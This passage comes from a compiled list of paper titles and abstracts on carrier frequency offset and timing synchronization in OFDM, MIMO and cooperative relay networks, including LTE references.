ambiguity effect of the CIR which is caused by an inaccurate coarse symbol timing offset (STO). In the proposed fine STR, the CIR of the MISO channel is estimated after performing coarse STR. Then, the ambiguity of the CIR is investigated by categorizing it into four regions under the assumption of an inaccurate STO. Finally, accurate STO is estimated by changing the fast Fourier transform (FFT) window with respect to the ambiguity categorization. Performance evaluations are accomplished by comparing the proposed STR with the conventional STR in large delay channels. --- paper_title: Blind Identification of Spatial Multiplexing and Alamouti Space-Time Block Code via Kolmogorov-Smirnov (K-S) Test paper_content: A novel algorithm for blind identification of spatial multiplexing and Alamouti space-time block code is proposed in this paper. It relies on the Kolmogrov-Smirnov test, and employs the maximum distance between the empirical cumulative distribution functions of two statistics derived from the received signal. The proposed algorithm does not require estimation of the channel coefficients, noise statistics and modulation type, and is robust to the carrier frequency offset and impulsive noise. Additionally, it outperforms the algorithms in the literature under a variety of transmission impairments. --- paper_title: Physical-Layer Network Coding Using FSK Modulation under Frequency Offset paper_content: Physical-layer network coding is a protocol capable of increasing throughput over conventional relaying in the two- way relay channel, but is sensitive to phase and frequency offsets among transmitted signals. Modulation techniques which require no phase synchronization such as noncoherent FSK can compensate for phase offset, however, the relay receiver must still compensate for frequency offset. In this work, a soft- output noncoherent detector for the relay is derived, under the assumption that the source oscillators generating FSK tones lack frequency synchronization. The derived detector is shown through simulation to improve error rate performance over a conventional detector which does not model offset, for offset values on the order of a few hundredths of a fraction of FSK tone spacing. --- paper_title: A New ML Detector for SIMO Systems with Imperfect Channel and Carrier Frequency Offset Estimation paper_content: The objective of this paper is to develop a new detection algorithm for single input multiple output (SIMO) systems, using maximum likelihood (ML) scheme. The proposed method takes into account both channel and carrier frequency offset (CFO) estimation errors for detection of the transmitted data. Simulation results show that the new algorithm improve performance in the presence of multiple estimation error variances as compared to the conventional method for different modulation schemes. --- paper_title: Estimation, Training, and Effect of Timing Offsets in Distributed Cooperative Networks paper_content: Successful collaboration in cooperative networks require accurate estimation of multiple timing offsets. When combined with signal processing algorithms the estimated timing offsets can be applied to mitigate the resulting inter-symbol interference (ISI). This paper seeks to address timing synchronization in distributed multi-relay amplify-and-forward (AF) and decode-and-forward (DF) relaying networks, where timing offset estimation using a training sequence is analyzed. First, training sequence design guidelines are presented that are shown to result in improved estimation performance. Next, two iterative estimators are derived that can determine multiple timing offsets at the destination. The proposed estimators have a considerably lower computational complexity while numerical results demonstrate that they are accurate and reach or approach the Cramer-Rao lower bound (CRLB). --- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR). When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). --- paper_title: H-inf channel estimation for MIMO-OFDM systems in the presence of carrier frequency offset paper_content: An H-infinity (H-inf) channel estimation algorithm is proposed for estimating the channels in MIMO-OFDM systems in the presence of carrier frequency offset (CFO). The goal is to contribute to an algorithm with low complexity, good estimate performance and better suppression to CFO. For this purpose, the H-inf with simplified objective function is first developed, and then, its computational load is reduced by using the iterative expectation maximization (EM) process. To resistant the CFO, we derive a precise equivalent signal model (ESM) to identify the channels. It is observed that the H-inf estimator could be regarded as a substitute for optimal maximum a posteriori (MAP) estimator, but with much less complexity. At the same time, by using ESM, a remarkable improvement for the performance degradation caused by CFO will appear. --- paper_title: Practical analysis of codebook design and frequency offset estimation for virtual-multiple-input-multipleoutput systems paper_content: A virtual-multiple-input-multiple-output (MIMO) wireless system using the receiver-side cooperation with the compress-and-forward (CF) protocol, is an alternative to a point-to-point MIMO system, when a single receiver is not equipped with multiple antennas. It is evident that the practicality of CF cooperation will be greatly enhanced if an efficient source coding technique can be used at the relay. It is even more desirable that CF cooperation should not be unduly sensitive to carrier frequency offsets (CFOs). This study presents a practical study of these two issues. Firstly, codebook designs of the Voronoi vector quantisation (VQ) and the tree-structure VQ (TSVQ) to enable CF cooperation at the relay are described. A comparison in terms of the codebook design and encoding complexity is analysed. It is shown that the TSVQ is much simpler to design and operate, and can achieve a favourable performance-complexity tradeoff. Furthermore, this study demonstrates that CFO can lead to significant performance degradation for the virtual-MIMO system. To overcome this, it is proposed to maintain clock synchronisation and jointly estimate the CFO between the relay and the destination. This approach is shown to provide a significant performance improvement. --- paper_title: DSTBC based DF cooperative networks in the presence of timing and frequency offsets paper_content: In decode-and-forward (DF) relaying networks, the received signal at the destination may be affected by multiple impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). This paper proposes novel optimal and sub-optimal minimum mean-square error (MMSE) receiver designs at the destination node to detect the signal in the presence of these impairments. Distributed space-time block codes (DSTBCs) are used at the relays to achieve spatial diversity. The proposed sub-optimal receiver uses the estimated values of multiple channel gains, MTOs, and MCFOs, while the optimal receiver assumes perfect knowledge of these impairments at the destination and serves as a benchmark performance measure. To achieve robustness to estimation errors, the estimates statistical properties are exploited at the destination. Simulation results show that the proposed optimal and sub-optimal MMSE compensation receivers achieve full diversity gain in the presence of channel and synchronization impairments in DSTBC based DF cooperative networks. --- paper_title: Comments on "Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems" paper_content: This comment first shows that the Cramer-Rao lower bound (CRLB) derivations in the above paper are not exact. In addition, contrary to the claims in the above paper, the assumptions of perfect timing offset estimation and matched-filtering at the relays affect the generality of the analytical results and cannot be justified. --- paper_title: Optimal Training Sequences for Joint Timing Synchronization and Channel Estimation in Distributed Communication Networks paper_content: For distributed multi-user and multi-relay cooperative networks, the received signal may be affected by multiple timing offsets (MTOs) and multiple channels that need to be jointly estimated for successful decoding at the receiver. This paper addresses the design of optimal training sequences for efficient estimation of MTOs and multiple channel parameters. A new hybrid Cramer-Rao lower bound (HCRB) for joint estimation of MTOs and channels is derived. Subsequently, by minimizing the derived HCRB as a function of training sequences, three training sequence design guidelines are derived and according to these guidelines, two training sequences are proposed. In order to show that the proposed design guidelines also improve estimation accuracy, the conditional Cramer-Rao lower bound (ECRB), which is a tighter lower bound on the estimation accuracy compared to the HCRB, is also derived. Numerical results show that the proposed training sequence design guidelines not only lower the HCRB, but they also lower the ECRB and the mean-square error of the proposed maximum a posteriori estimator. Moreover, extensive simulations demonstrate that application of the proposed training sequences significantly lowers the bit-error rate performance of multi-relay cooperative networks when compared to training sequences that violate these design guidelines. --- paper_title: Time and frequency offset estimation for distributed multiple-input multiple-output orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of time and frequency offset estimation in the case of the delays, and the frequency offsets of all the transmitter/receiver pairs are different for distributed multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) systems. A new training structure is designed and an efficient time and frequency offset estimator is proposed. With the symmetric conjugate property of the preamble, the timing metric proposed has an impulse shape, making the time offset estimation accurate. Using the repetition property of the preamble, iterative frequency offset estimation algorithm proposed can acquire a high precision and a wide estimation range. To distinguish different transmit antennas, the preamble is weighted by pseudo-noise (PN) sequences with low cross-correlations. The analysis and the simulation results show that the proposed estimator offers an accurate estimation on the different time delays and frequency offsets caused by the distributed transmitters of the MIMO-OFDM system. This is a situation that the conventional estimators cannot handle as far. --- paper_title: Joint estimation of I/Q imbalance, CFO and channel response for MIMO OFDM systems paper_content: In this paper, we study the joint estimation of inphase and quadrature-phase (I/Q) imbalance, carrier frequency offset (CFO), and channel response for multiple-input multipleoutput (MIMO) orthogonal frequency division multiplexing (OFDM) systems using training sequences. A new concept called channel residual energy (CRE) is introduced. We show that by minimizing the CRE, we can jointly estimate the I/Q imbalance and CFO without knowing the channel response. The proposed method needs only one OFDM block for training and the training symbols can be arbitrary. Moreover when the training block consists of two repeated sequences, a low complexity two-step approach is proposed to solve the joint estimation problem. Simulation results show that the mean-squared error (MSE) of the proposed method is close to the Cramer-Rao bound (CRB). --- paper_title: A Novel Frequency Offset Tracking Algorithm for Space-Time Block Coded OFDM Systems paper_content: A novel frequency offset tracking algorithm for Space-Time Block Coded (STBC) Orthogonal Frequency Division Multiplexing (OFDM) systems is proposed in this work. Tracking of a frequency offset between the transmitter and the receiver is often aided by transmitting pilots embedded in the data payload. The proposed algorithm mainly exploits the specific construction of the OFDM symbol in STBC-OFDM systems, which does not need any additional pilots or sequences in the data field, providing high efficiency in spectrum. The estimator is derived on the basis of the maximum likelihood theory. Simulation results show that in a 2×2 multiple input multiple output (MIMO) system, under the assumption that the antennas are uncorrelated to each other, this method can provide a significant performance improvement in terms of the estimation accuracy of the frequency offset. --- paper_title: Quantize and forward cooperative communication: Joint channel and frequency offset estimation paper_content: Cooperative communication systems can effectively be used to combat fading. A cooperative protocol that can be used with half-duplex terminals is the quantize and forward (QF) protocol, in which the relay quantizes the information received from the source before forwarding it to the destination. Most studies on the QF protocol are carried out under the assumption of perfect channel state information (CSI) at the destination, which is not often the case in real-life systems. Therefore, in the present contribution, the effect of incomplete CSI is analyzed for flat Rayleigh fading channels with a frequency offset. To limit the complexity of the estimation, the destination terminal assumes that the relay operates in an amplify and forward (AF) mode. By using the expectation maximization (EM) algorithm to refine the initial pilot-based estimates, the resulting error performance can be made very close to that of a system with perfect CSI. --- paper_title: Iterative Joint Detection, ICI Cancelation and Estimation of Multiple CFOs and Channels for DVB-T2 in MISO Transmission Mode paper_content: When DVB-T2 uses the option of (distributed) multiple-input single-output transmission mode, a pair of Alamouti-encoded orthogonal frequency division multiplex signals is transmitted simultaneously from two spatially separated transmitters in a single frequency network. Since both transmitters have their own local oscillators, two distinct carrier frequency offsets (CFOs), one for each transmitter-receiver link, occur in the received signal due to the frequency mismatch between the local oscillators. Unfortunately, the multiple CFOs cannot be compensated simultaneously by merely adjusting the carrier frequency at the receiver side, so intercarrier interference (ICI) always exists. In this paper, we present an iterative receiver design to combat multiple CFOs for DVB-T2 application. To estimate both multiple CFOs and channels jointly without sacrificing the spectral efficiency, the joint maximum likelihood (ML) estimation based on the soft information from the channel decoder is used. The proposed receiver performs the iterative joint processing of the data detection, ICI cancelation, and joint ML estimation of the multiple CFOs and channels by exchanging the soft information. We also show that the complexity of the joint ML estimation can be reduced significantly by transforming a huge matrix pseudo-inversion into two sub-matrix pseudo-inversions. The performances are evaluated via a full DVB-T2 simulator. The numerical results show that the mean-squared error performance of the joint ML estimation is closely matched with the Cramer-Rao bound. Furthermore, the resulting bit error rate performance is enhanced in a progressive manner and is able to approach the ideal CFOs-free performance within a few iterations. --- paper_title: Transceiver Design for Distributed STBC Based AF Cooperative Networks in the Presence of Timing and Frequency Offsets paper_content: In multi-relay cooperative systems, the signal at the destination is affected by impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). In this paper we account for all these impairments and propose a new transceiver structure at the relays and a novel receiver design at the destination in distributed space-time block code (DSTBC) based amplify-and-forward (AF) cooperative networks. The Cramer-Rao lower bounds and a least squares (LS) estimator for the multi-parameter estimation problem are derived. In order to significantly reduce the receiver complexity at the destination, a differential evolution (DE) based estimation algorithm is applied and the initialization and constraints for the convergence of the proposed DE algorithm are investigated. In order to detect the signal from multiple relays in the presence of unknown channels, MTOs, and MCFOs, novel optimal and sub-optimal minimum mean-square error receiver designs at the destination node are proposed. Simulation results show that the proposed estimation and compensation methods achieve full diversity gain in the presence of channel and synchronization impairments in multi-relay AF cooperative networks. --- paper_title: Low-Complexity Sequential Searcher for Robust Symbol Synchronization in OFDM Systems paper_content: Based on the frequency-domain analog-to-digital conversion (FD ADC), this work builds a low-complexity sequential searcher for robust symbol synchronization in a 4 × 4 FD multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) modem. The proposed scheme adopts a symbol-rate sequential search with simple cross-correlation metric to recover symbol timing over the frequency domain. Simulation results show that the detection error is less than 2% at signal-to-noise ratio (SNR) ≤5 dB. Performance loss is not significant when carrier frequency offset (CFO) ≤100 ppm. Using an in-house 65-nm CMOS technology, the proposed solution occupies 84.881 k gates and consumes 5.2 mW at 1.0 V supply voltage. This work makes the FD ADC more attractive to be adopted in high throughput OFDM systems. --- paper_title: A Bayesian Algorithm for Joint Symbol Timing Synchronization and Channel Estimation in Two-Way Relay Networks paper_content: This work investigates joint estimation of symbol timing synchronization and channel response in two-way relay networks (TWRN) that utilize amplify-and-forward (AF) relay strategy. With unknown relay channel gains and unknown timing offset, the optimum maximum likelihood (ML) algorithm for joint timing recovery and channel estimation can be overly complex. We develop a new Bayesian based Markov chain Monte Carlo (MCMC) algorithm in order to facilitate joint symbol timing recovery and effective channel estimation. In particular, we present a basic Metropolis-Hastings algorithm (BMH) and a Metropolis-Hastings-ML (MH-ML) algorithm for this purpose. We also derive the Cramer-Rao lower bound (CRLB) to establish a performance benchmark. Our test results of ML, BMH, and MH-ML estimation illustrate near-optimum performance in terms of mean-square errors (MSE) and estimation bias. We further present bit error rate (BER) performance results. --- paper_title: Timing and Frequency Offsets Compensation in Relay Transmission for 3GPP LTE Uplink paper_content: Relays can be used between the source and the destination to improve network coverage or reliability. In the relay based distributed space-time block-coded (DSTBC) single-carrier (SC) transmission scheme, asynchronism in time and frequency causes degradation in system performance because of the interblock interference, non-coherent combining and multiuser interference. The simultaneous presence of timing offset and carrier frequency offset also destroy the orthogonal structure of DSTBC. In this paper, we study the combined effect of timing offset and carrier frequency offset and propose a two stage equalization technique for this system at the destination terminal. Technique is based on interference cancellation and cyclic prefix reconstruction. The proposed equalization technique maintains the orthogonal structure of DSTBC and allows the use of low complexity one-tap frequency-domain equalizer. The technique significantly alleviates the effect of time offsets and frequency offsets at the destination without increasing the complexity of the receiver or disturbing the 3rd generation partnership project-long term evolution (3GPP LTE) uplink frame structure or the data rate over frequency selective channels. --- paper_title: Inter-carrier interference-free Alamouti-coded OFDM for cooperative systems with frequency offsets in non-selective fading environments paper_content: A modified Alamouti-coded orthogonal frequency division multiplexing (OFDM) scheme is proposed for cooperative systems in non-selective fading environments. Even with the frequency offset between two distributed transmit antennas, the proposed scheme achieves ideal performance and full rate of Alamouti code. By switching subcarriers in the second OFDM symbol of each Alamouti-coded OFDM symbol pair after a simple-phase rotation in the first OFDM symbol, inter-carrier interference terms can be perfectly cancelled after a simple linear combining with the processing overhead of two times down-conversions and discrete Fourier transform (DFT) operations at each OFDM symbol. --- paper_title: Joint Carrier Frequency Offset and fast time-varying channel estimation for MIMO-OFDM systems paper_content: In this paper, a novel pilot-aided iterative algorithm is developed for MIMO-OFDM systems operating in fast time-varying environment. An L-path channel model with known path delays is considered to jointly estimate the multi-path Rayleigh channel complex gains and Carrier Frequency Offset (CFO). Each complex gain time-variation within one OFDM symbol is approximated by a Basis Expansion Model (BEM) representation. An auto-regressive (AR) model is built for the parameters to be estimated. The algorithm performs recursive estimation using Extended Kalman Filtering. Hence, the channel matrix is easily computed and the data symbol is estimated with free inter-sub-carrier-interference (ICI) when the channel matrix is QR-decomposed. It is shown that only one iteration is sufficient to approach the performance of the ideal case for which the knowledge of the channel response and CFO is available. --- paper_title: Training-Based Synchronization and Channel Estimation in AF Two-Way Relaying Networks paper_content: Two-way relaying networks (TWRNs) allow for more bandwidth efficient use of the available spectrum since they allow for simultaneous information exchange between two users with the assistance of an intermediate relay node. However, due to superposition of signals at the relay node, the received signal at the user terminals is affected by multiple impairments, i.e., channel gains, timing offsets, and carrier frequency offsets, that need to be jointly estimated and compensated. This paper presents a training-based system model for amplify-and-forward (AF) TWRNs in the presence of multiple impairments and proposes maximum likelihood and differential evolution based algorithms for joint estimation of these impairments. The Cramer-Rao lower bounds (CRLBs) for the joint estimation of multiple impairments are derived. A minimum mean-square error based receiver is then proposed to compensate the effect of multiple impairments and decode each user's signal. Simulation results show that the performance of the proposed estimators is very close to the derived CRLBs at moderate-to-high signal-to-noise-ratios. It is also shown that the bit-error rate performance of the overall AF TWRN is close to a TWRN that is based on assumption of perfect knowledge of the synchronization parameters. --- paper_title: Network-Wide Distributed Carrier Frequency Offsets Estimation and Compensation via Belief Propagation paper_content: In this paper, we propose a fully distributed algorithm for frequency offsets estimation in decentralized systems. With the proposed algorithm, each node estimates its frequency offsets by local computations and limited exchange of information with its direct neighbors. Such algorithm does not require any centralized information processing or knowledge of global network topology. It is shown analytically that the proposed algorithm always converges to the optimal estimates regardless of network topology. Simulation results demonstrate the fast convergence of the algorithm and show that estimation mean-squared-error at each node touches the centralized Cram\'{e}r-Rao bound within a few {iterations of message exchange}. Therefore, the proposed method has low overhead and is scalable with network size. --- paper_title: Blind Timing and Carrier Synchronization in Decode and Forward Cooperative Systems paper_content: Synchronization in Decode and Forward (DF) cooperative communication systems is a complex and challenging task requiring estimation of many independent timing and carrier offsets at each relay in the broadcasting phase and multiple timing and carrier offsets at the destination in the relaying phase. This paper presents a scheme for blind channel, timing and carrier offset estimation in a DF cooperative system with one source, M relays and one destination equipped with N antennas. In particular, we exploit blind source separation at the destination to convert the difficult problem of jointly estimating multiple synchronization parameters in the relaying phase into more tractable sub-problems of estimating many individual timing and carrier offsets for the independent relays. We also modify and propose a criteria for best relay selection at the destination. Simulation results demonstrate the excellent end-to-end Bit Error Rate (BER) performance of the proposed blind scheme with relay selection, which is shown to achieve the maximum diversity order with M = 4 relays using N = 5 antennas at the destination. The presented work is a complete solution to blind synchronization and channel estimation in DF cooperative communication systems. --- paper_title: Alamouti Coding Scheme for AF Relaying With Doppler Shifts paper_content: In this paper, we propose an Alamouti-code-based relaying scheme for frequency asynchronous amplify-and-forward (AF) relay networks. Both the oscillator frequency offsets and the Doppler shifts among the distributed nodes are considered in our design. We employ orthogonal frequency-division multiplexing (OFDM) modulation at the source node and let the two relay nodes implement only simple operations, such as time reversal, conjugation, and amplification. We show that without Doppler shifts, the multiple carrier frequency offsets (CFOs) can be directly compensated at the destination, and the received signals exhibit an Alamouti-like structure. We further prove that full spatial diversity can be achieved by the fast symbol-wise detection when the oscillator frequency offset between the relay nodes is smaller than a certain threshold, which yields lower decoding complexity compared with the existing schemes. In the case with Doppler shifts, where the direct CFO compensation becomes impossible, we develop a repetition-aided Alamouti coding approach, by which full diversity can be nearly achieved from the fast symbol-wise detection. Numerical results are provided to corroborate the proposed studies. --- paper_title: Space–Frequency Convolutional Coding for Frequency-Asynchronous AF Relay Networks paper_content: In this paper, we design a space-frequency (SF) convolutional coding scheme for amplify-and-forward (AF) relay networks that contain multiple distributed relay nodes. The frequency-asynchronous nature of the distributed system is considered in our design. Orthogonal frequency-division multiplexing (OFDM) modulation is adopted, which is robust to certain timing errors. We exploit the signal space diversity technique and employ an extended cyclic prefix (CP) at the source node. The relay nodes need to perform only simple operations, e.g., convolution and amplification, and they need no information about the channels and the frequency offsets. Attributed to the extended CP, the multiple frequency offsets can directly be compensated at the destination. We further prove that both spatial and multipath diversity can be achieved by the proposed scheme. Numerical results are provided to corroborate the proposed studies. --- paper_title: Multiple CFO Mitigation in Amplify-and-Forward Cooperative OFDM Transmission paper_content: In cooperative orthogonal frequency division multiplexing (OFDM) systems, accurate frequency synchronization is critical to achieving any potential gains brought by the cooperative operation. The carrier frequency offsets (CFOs) present among multiple nodes (source, relays and destination) are more difficult to tackle than the single CFO problem in point-to-point systems. Multiple CFOs cause phase drift, inter-carrier interference (ICI) and inter-block interference (IBI) in the received signal. This paper deals with the CFO induced interference mitigation problem in distributed space time block coded (STBC) amplify-and-forward (AF) cooperative OFDM systems. We propose a two step approach to recover the phase distortion and suppress the ICI and IBI using low complexity methods to achieve high performance. The first step is time domain (TD) compensation and the second step is frequency domain (FD) decoding. Two TD compensation schemes are proposed, i.e., IBI-removal and ICI-removal. The IBI-removal scheme decouples the two blocks of one STBC codeword completely and then decodes the ICI degraded blocks individually. The ICI-removal scheme removes ICI first and the subsequent decoding requires joint decoding of the two blocks. Simulation results show that the IBI-removal scheme which is of lower complexity performs well with small CFO. For large CFO, the ICI-removal with modified iterative joint maximum likelihood decoding (MIJMLD) outperforms other schemes. --- paper_title: Joint channel, phase noise, and carrier frequency offset estimation in cooperative OFDM systems paper_content: Cooperative communication systems employ cooperation among nodes in a wireless network to increase data throughput and robustness to signal fading. However, such advantages are only possible if there exist perfect synchronization among all nodes. Impairments like channel multipath, time varying phase noise (PHN) and carrier frequency offset (CFO) result in the loss of synchronization and diversity performance of cooperative communication systems. Joint estimation of these multiple impairments is necessary in order to correctly decode the received signal in cooperative systems. In this paper, we propose an iterative pilot-aided algorithm based on expectation conditional maximization (ECM) for joint estimation of multipath channels, Wiener PHNs, and CFOs in amplify-and-forward (AF) based cooperative orthogonal frequency division multiplexing (OFDM) system. Numerical results show that the proposed estimator achieves mean square error performance close to the derived hybrid Cramer-Rao lower bound (HCRB) for different PHN variances. --- paper_title: Decentralised ranging method for orthogonal frequency division multiple access systems with amplify-and-forward relays paper_content: In this study, a decentralised ranging method for uplink orthogonal frequency division multiple access (OFDMA) systems with half-duplex (HD) amplify-and-forward (AF) relay stations (RSs) is proposed. In the OFDMA systems with HD AF RSs, twice more resources and delays are required as ranging without RS. To reduce the required resources and delays for ranging, the authors propose a two-phase ranging scheme based on the decentralised timing-offset estimation at each ranging mobile station (MS). At the first phase, RS occasionally broadcasts timing reference signal, and at the second phase RS retransmits the collected ranging signals from the MSs. Then, each ranging MSs can individually estimate its own timing offset from the received signals. In the proposed ranging method, the base station does not need to send a timing-adjustment message, and the overhead associated with ranging in the downlink resources, and computational complexity can be significantly reduced without degrading the timing-offset-estimation performance. Moreover, the delay associated with ranging can be maintained as same as ranging without RS. --- paper_title: Compensation of multiple carrier frequency offsets in amplify-and-forward cooperative networks paper_content: In this paper, we propose a method to find an optimal correction value for multiple carrier frequency offsets (CFO) compensation, where two received signals have different path gains, in orthogonal frequency division multiplexing (OFDM) systems. Multiple CFOs are occurred when two spatially-separated transmitters are used to transmit the same signal simultaneously. In this case, the sidelobes of the subcarrier spectrums of the undesired signals have similar magnitude with opposite signs. Based on this fact, we propose a self-cancellation method of intercarrier interference caused by multiple CFOs. In the proposed scheme, we compensate the multiple CFOs for the signal to intercarrier interference power ratio of the received signal to be maximized, instead only the signal power is maximized in the ordinary methods. --- paper_title: Frequency Offset and Channel Estimation in Co-Relay Cooperative OFDM Systems paper_content: Frequency offset and channel estimation in cooperative orthogonal frequency division multiplexing (OFDM) systems is studied in this paper. We consider the scenario of two or more source nodes sharing the same relay, i.e., corelay cooperative communications, and a new preamble, which is central-symmetric in time-domain, is proposed to perform the frequency offset and channel estimation. The non-zero samples in the proposed preamble are sparsely distributed with two neighboring non-zero samples being separated by μ > 1 zeros. As long as μ > 2L - 1 is satisfied, the multipath interference can be effectively eliminated, where L stands for the channel order. Unlike [1], the proposed preamble has a much lower Peak-to-Average Power Ratio (PAPR). The interference among the multiple source nodes can also be eliminated by using a backoff modulation scheme on the proposed preamble in each source node, and the mean-square error (MSE) of the proposed Least-Square (LS) channel estimator can be minimized by ensuring the orthogonality among the source nodes. The Pairwise Error Probability (PEP) performance of the proposed system by considering both the frequency offset and channel estimation errors is also derived in this paper. For a given Signalto-Noise-Ratio (SNR), by keeping the total power consumption to the source nodes and the relay to be constant, the PEP can be minimized by adjusting the ratio between the power allocated to the source nodes and the total power. --- paper_title: OFDM Transmission scheme for asynchronous two-way multi-relay cooperative networks with analog network coding paper_content: For two-way relaying assisted by analog network coding, most investigation so far is based on perfect synchronization assumption. In contrast, in this paper we consider the more practical asynchronism assumption, and develop a new OFDM transmission scheme that is robust to the lack of synchronization in both timing and carrier frequency. In our scheme, the relays' signals are constructed by fusing several OFDM symbols received from the source nodes transmissions. The source node receivers can successfully demodulate the received OFDM signals after mitigating effectively multiple carrier frequency offsets and multiple timing phase offsets. Simulations are conducted to demonstrate its superior performance. This scheme has the same bandwidth efficiency as the conventional OFDM transmission, and can achieve the same relaying gain as the existing multiple relay transmissions. By relieving the stringent synchronization requirement, this scheme leads to simplified relay design, which makes it more practical to exploit multiple relays in two-way relaying networks. --- paper_title: Carrier Frequency Offset Estimation for Two-Way Relaying: Optimal Preamble and Estimator Design paper_content: We consider the problem of carrier frequency offset (CFO) estimation for a two-way relaying system based on the amplify-and-forward (AF) protocol. Our contributions are in designing an optimal preamble, and the corresponding estimator, to closely achieve the minimum Cramer-Rao bound (CRB) for the CFO. This optimality is asserted with respect to the novel class of preambles, referred to as the block-rotated preambles (BRPs). This class includes the periodic preamble that is used widely in practice, yet it provides an additional degree of design freedom via a block rotation angle. We first identify the catastrophic scenario of an arbitrarily large CRB when a conventional periodic preamble is used. We next resolve this problem by using a BRP with a non-zero block rotation angle. This angle creates, in effect, an artificial frequency offset that separates the desired relayed signal from the self-interference that is introduced in the AF protocol. With appropriate optimization, the CRB incurs only marginal loss from one-way relaying under practical channel conditions. To facilitate implementation, a specific low-complexity class of estimators is examined, and conditions for the estimators to achieve the optimized CRB is established. Numerical results are given which corroborate with theoretical findings. --- paper_title: Joint CFO and Channel Estimation for OFDM-Based Two-Way Relay Networks paper_content: Joint estimation of the carrier frequency offset (CFO) and the channel is developed for a two-way relay network (TWRN) that comprises two source terminals and an amplify-and-forward (AF) relay. The terminals use orthogonal frequency division multiplexing (OFDM). New zero-padding (ZP) and cyclic-prefix (CP) transmission protocols, which maintain the carrier orthogonality and ensure low estimation and detection complexity, are proposed. Both protocols lead to the same estimation problem which can be solved by the nulling-based least square (LS) algorithm and perform identically when the block length is large. We present detailed performance analysis by proving the unbiasedness of the LS estimators at high signal-to-noise ratio (SNR) and by deriving the closed-form expression of the mean-square-error (MSE). Simulation results are provided to corroborate our findings. --- paper_title: Localized or Interleaved? A Tradeoff between Diversity and CFO Interference in Multipath Channels paper_content: Carrier frequency offset (CFO) damages the orthogonality between sub-carriers and thus causes multiuser interference in uplink OFDMA/SC-FDMA systems. For a given CFO, such multiuser interference is mainly dictated by channel (sub-carrier) allocation, which also specifies the diversity gain of one user over multi-path channels. In particular, the positions of one user's sub-channels will determine its diversity gain, while the distances between sub-channels of the concerned user and those of others will govern the CFO interference. Two popular channel allocation methods are the localized and interleaved (distributed) schemes where the former has less CFO interference but the latter achieves more diversity gain. In this paper, we will consider the channel allocation scheme for uplink LTE systems by investigating the effects of channel allocation on both of the diversity gain and CFO interference. By combining these two effects, we will propose a semi-interleaved scheme, which achieves full diversity gain with minimum CFO interference. --- paper_title: Lte - The Umts Long Term Evolution: From Theory to Practice paper_content: Where this book is exceptional is that the reader will not just learn how LTE works but why it works Adrian Scrase, ETSI Vice-President, International Partnership Projects LTE - The UMTS Long Term Evolution: From Theory to Practice provides the reader with a comprehensive system-level understanding of LTE, built on explanations of the theories which underlie it. The book is the product of a collaborative effort of key experts representing a wide range of companies actively participating in the development of LTE, as well as academia. This gives the book a broad, balanced and reliable perspective on this important technology. Lucid yet thorough, the book devotes particular effort to explaining the theoretical concepts in an accessible way, while retaining scientific rigour. It highlights practical implications and draws comparisons with the well-known WCDMA/HSPA standards. The authors not only pay special attention to the physical layer, giving insight into the fundamental concepts of OFDMA, SC-FDMA and MIMO, but also cover the higher protocol layers and system architecture to enable the reader to gain an overall understanding of the system. Key Features: Draws on the breadth of experience of a wide range of key experts from both industry and academia, giving the book a balanced and broad perspective on LTE Provides a detailed description and analysis of the complete LTE system, especially the ground-breaking new physical layer Offers a solid treatment of the underlying advances in fundamental communications and information theory on which LTE is based Addresses practical issues and implementation challenges related to the deployment of LTE as a cellular system Includes an accompanying website containing a complete list of acronyms related to LTE, with a brief description of each (http://www.wiley.com/go/sesia_theumts) This book is an invaluable reference for all research and development engineers involved in LTE implementation, as well as graduate and PhD students in wireless communications. Network operators, service providers and R&D managers will also find this book insightful. --- paper_title: An interference self-cancellation technique for SC-FDMA systems paper_content: A new interference self-cancellation (ISC) method for Single Carrier-FDMA (SC-FDMA) systems is proposed to mitigate the inter-user interference caused by frequency offset or Doppler effect. By transmitting a compensation symbol at the first symbol location in each resource block, the energy leakage can be significantly suppressed. With little bandwidth and power sacrifice, the proposed method can greatly improve the system robustness against frequency offset. Simulation results show that the signal-to-interference ratio (SIR) can be improved by 7 dB on average for the entire system band, and up to 11.7 dB for an individual user. --- paper_title: Adaptive schemes and analysis for blind beamforming with insufficient cyclic prefix 